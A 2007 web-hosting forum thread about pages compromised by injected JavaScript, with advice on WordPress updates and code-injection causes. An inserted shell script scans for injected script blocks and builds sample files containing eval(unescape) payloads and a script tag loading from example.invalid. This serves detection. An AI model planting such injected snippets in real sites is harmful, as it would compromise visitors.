
Thread: I've been hacked - what now?

  1. #1
    Junior Member Newbie
    Join Date
    Jan 2007
    Posts
    13

    I've been hacked - what now?

    I discovered script tags embedded in all of my index.php files this morning. Obviously my system has been compromised. I'm not sure what to do next, any suggested steps are appreciated. Also, please provide all command line details as I'm not an experienced unix user. Thanks in advance!!

    Here's what I've done:
    1 - removed offending scripts
    2 - changed all of my passwords

    I'm trying to identify and kill malicious processes and files on my machine but I don't really know where to start.

    Running the 'top' command shows me a bunch of processes, none of which I recognize...

    1 root 16 0 1668 616 532 S 0.0 0.0 0:11.59 init
    30546 root 16 0 1540 556 468 S 0.0 0.0 0:28.50 syslogd
    30662 root 17 0 2224 1124 964 S 0.0 0.0 0:00.00 mysqld_safe
    30693 mysql 16 0 107m 23m 5100 S 0.0 0.2 3:32.00 mysqld
    31828 qmails 16 0 1516 480 392 S 0.0 0.0 0:07.92 qmail-send
    31830 qmaill 15 0 1472 452 392 S 0.0 0.0 0:00.88 splogger
    31831 root 16 0 1500 380 296 S 0.0 0.0 0:00.00 qmail-lspawn
    31832 qmailr 16 0 1760 756 304 S 0.0 0.0 0:00.54 qmail-rspawn
    31833 qmailq 15 0 1464 344 284 S 0.0 0.0 0:00.41 qmail-clean
    31856 root 16 0 42088 21m 8956 S 0.0 0.2 0:20.88 httpd
    32478 popuser 16 0 24360 21m 2356 S 0.0 0.2 0:09.08 spamd
    32565 popuser 16 0 24360 21m 2356 S 0.0 0.2 0:09.30 spamd
    32733 popuser 17 0 24360 19m 692 S 0.0 0.2 0:00.00 spamd
    32741 popuser 16 0 24360 19m 692 S 0.0 0.2 0:00.00 spamd
    1354 root 16 0 48016 5096 3296 S 0.0 0.0 0:14.55 httpsd
    1409 root 16 0 2492 940 544 S 0.0 0.0 0:01.14 crond
    1418 root 18 0 4352 808 560 S 0.0 0.0 0:00.00 saslauthd
    27665 root 15 0 28548 11m 124 S 0.0 0.1 0:00.00 httpd
    23606 apache 15 0 50456 27m 6224 S 0.0 0.2 0:14.06 httpd
    17559 apache 15 0 50496 27m 6308 S 0.0 0.2 0:08.41 httpd
    30143 apache 15 0 50432 26m 5492 S 0.0 0.2 0:05.51 httpd
    30061 psaadm 16 0 57140 27m 20m S 0.0 0.2 0:06.40 httpsd
    30305 psaadm 16 0 56124 27m 20m S 0.0 0.2 0:04.60 httpsd
    30351 psaadm 16 0 56316 26m 19m S 0.0 0.2 0:06.58 httpsd
    30448 root 16 0 8836 2716 1980 S 0.0 0.0 0:00.39 sshd
    30627 root 16 0 2368 1376 1096 S 0.0 0.0 0:00.07 bash
    7957 root 18 0 4316 1040 728 S 0.0 0.0 0:00.00 sshd
    16075 apache 16 0 42964 18m 4980 S 0.0 0.2 0:00.17 httpd
    17575 apache 16 0 42852 18m 4976 S 0.0 0.2 0:00.15 httpd
    3823 root 16 0 1948 1000 804 R 0.0 0.0 0:00.00 top
    Last edited by black_box; 11-06-2007 at 10:46 AM.

  2. #2
    Ted@spry
    Guest


    It appears that there have been a ton of issues with WordPress break-ins recently. I would recommend that you update your WordPress application, as I suspect that your vulnerability was in an older version.

  3. #3
    Junior Member Newbie
    Join Date
    Aug 2007
    Posts
    4


    Hello,

    I have this issue too, happening for MONTHS! Every once in a while the script would lodge itself right near the closing </body> tag on my index.php and index.html pages.

    Sure, I remove it, then re-upload the file thinking it won't come back, but it always does.

    This has to be a Spry server issue; I don't use any blogs or WordPress, it is simple HTML/PHP code.

    I'm starting to get very annoyed. If some malicious script can easily insert JavaScript, who knows what other info it can steal?

    Here is the JavaScript:

    Thanks,
    Joe
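The posters above describe the same symptom: a `<script>` block that decodes itself with `eval(unescape(...))`, dropped into index.php and index.html near the closing `</body>` tag. The following scanner is an added example for the command-line steps asked for in post #1; it is not from the thread or from the hosting provider, and the sample web root it builds is constructed here for demonstration.

```shell
#!/bin/sh
# Added example (not from the thread): scan a web root for index.php and
# index.html files that carry an injected <script> block of the kind the
# posters describe. Two indicators are checked: an eval(unescape(...)) call,
# and a <script> tag placed after the closing </body> tag. Matching files are
# printed so their modification times can be compared with the web server
# logs to find when, and through which request, the change was made.

find_injected_scripts() {
    webroot="$1"
    find "$webroot" -type f \( -name 'index.php' -o -name 'index.html' \) |
    while IFS= read -r f; do
        # indicator 1: payload decodes itself with eval(unescape(...))
        # indicator 2: <script> after </body>; file flattened to one line first
        if grep -qi 'eval(unescape(' "$f" ||
           tr -d '\n' < "$f" | grep -qi '</body>[[:space:]]*<script'; then
            printf '%s\n' "$f"
        fi
    done | sort
}

count_injected() {
    find_injected_scripts "$1" | wc -l | tr -d ' '
}

# Constructed sample web root: two clean pages, two pages showing the
# injection patterns. A real run is pointed at the actual document root.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/site/blog" "$root/site/shop"
    printf '<html><body><h1>clean</h1></body></html>\n' \
        > "$root/site/index.html"
    printf '<html><body><script>var ok=1;</script></body></html>\n' \
        > "$root/site/about.html"
    printf '<?php echo "hi"; ?>\n<html><body>ok</body></html>\n<script language="javascript">$="%%63e%%3d";eval(unescape($));</script>\n' \
        > "$root/site/blog/index.php"
    printf '<html><body>shop</body>\n<script src="//example.invalid/x.js"></script></html>\n' \
        > "$root/site/shop/index.html"
    printf '%s\n' "$root"
}

# Usage: sh scan.sh /var/www/html   (path is an assumption; use your web root)
if [ "${1:-}" ]; then
    find_injected_scripts "$1"
fi
```

Files the scanner lists should be treated as evidence, not just cleaned: copy them aside with their timestamps before removing the injected block, since re-uploading a clean file loses the modification time that ties the change to a log entry.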

  4. #4
    Senior Member Power Poster
    Join Date
    Dec 2007
    Posts
    359


    Joe -

    The issue which you have described does not necessarily have to be WordPress or blog-related.

    If you are using any application which meets the following requirements, it is very likely that the issue is one of application-level security and not server-level security.

    Requirements:

    1) The application uses server-side scripting to display content.

    2) The application uses a database or file system to allow content to be edited.

    Attackers take advantage of an input validation error in an application to inject their JavaScript or HTML code into the application's database or file system (this is called a code injection attack) - the application then serves up the attacker's code, just as it would serve up any authorized edits which were made.

    It is also possible, though much less likely, that the attacker has access to the application's control panel or your server - attackers will generally take the path of least resistance by taking advantage of known flaws in applications.

    I would highly recommend that you consult with your server's administrator to ensure the security of your system and review the cPanel forums guide to security for advice.
